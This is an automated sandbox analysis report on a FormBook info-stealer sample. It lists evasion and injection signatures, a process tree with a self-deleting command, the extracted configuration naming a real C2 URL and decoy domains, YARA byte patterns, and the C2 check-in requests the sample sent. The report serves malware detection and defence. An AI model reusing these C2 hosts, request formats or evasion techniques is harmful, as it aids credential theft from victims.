Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 2435.bat

Overview

General Information

Sample Name:2435.bat (renamed file extension from bat to exe)
Analysis ID:433173
MD5:862b4c2abad2c07ac13d5e051c18ab86
SHA1:c78f0a59312c7902e445c5a31d4896907e96475c
SHA256:c347c2d7579053d263f6ab6eddca7bd03691ebab93b30b5caba462caa7106beb
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 2435.exe (PID: 6304 cmdline: 'C:\Users\user\Desktop\2435.exe' MD5: 862B4C2ABAD2C07AC13D5E051C18AB86)
    • 2435.exe (PID: 6340 cmdline: 'C:\Users\user\Desktop\2435.exe' MD5: 862B4C2ABAD2C07AC13D5E051C18AB86)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6932 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 3584 cmdline: /c del 'C:\Users\user\Desktop\2435.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.2435.exe.24d0000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.2435.exe.24d0000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.2435.exe.24d0000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        1.2.2435.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.2435.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 2435.exeReversingLabs: Detection: 43%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 2435.exeJoe Sandbox ML: detected
          Source: 1.1.2435.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.2435.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.2435.exe.24d0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.control.exe.4d7f834.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 9.2.control.exe.43b090.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2435.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: 2435.exe, 00000000.00000003.228355721.0000000009B60000.00000004.00000001.sdmp, 2435.exe, 00000001.00000002.288517092.0000000000B6F000.00000040.00000001.sdmp, control.exe, 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 2435.exe, control.exe
          Source: Binary string: control.pdbUGP source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_0040263E FindFirstFileA,

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.knighttechinca.com/dxe/
          Source: global trafficHTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W HTTP/1.1Host: www.northsytyle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e HTTP/1.1Host: www.shitarpa.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT HTTP/1.1Host: www.houseofsisson.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: global trafficHTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W HTTP/1.1Host: www.northsytyle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e HTTP/1.1Host: www.shitarpa.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT HTTP/1.1Host: www.houseofsisson.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.northsytyle.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: control.exe, 00000009.00000002.499880225.000000000526F000.00000004.00000001.sdmpString found in binary or memory: http://houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDI
          Source: 2435.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 2435.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419D5A NtCreateFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419E0A NtReadFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419E8A NtClose,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419F3A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9860 NtQuerySystemInformation,LdrInitializeThunk,
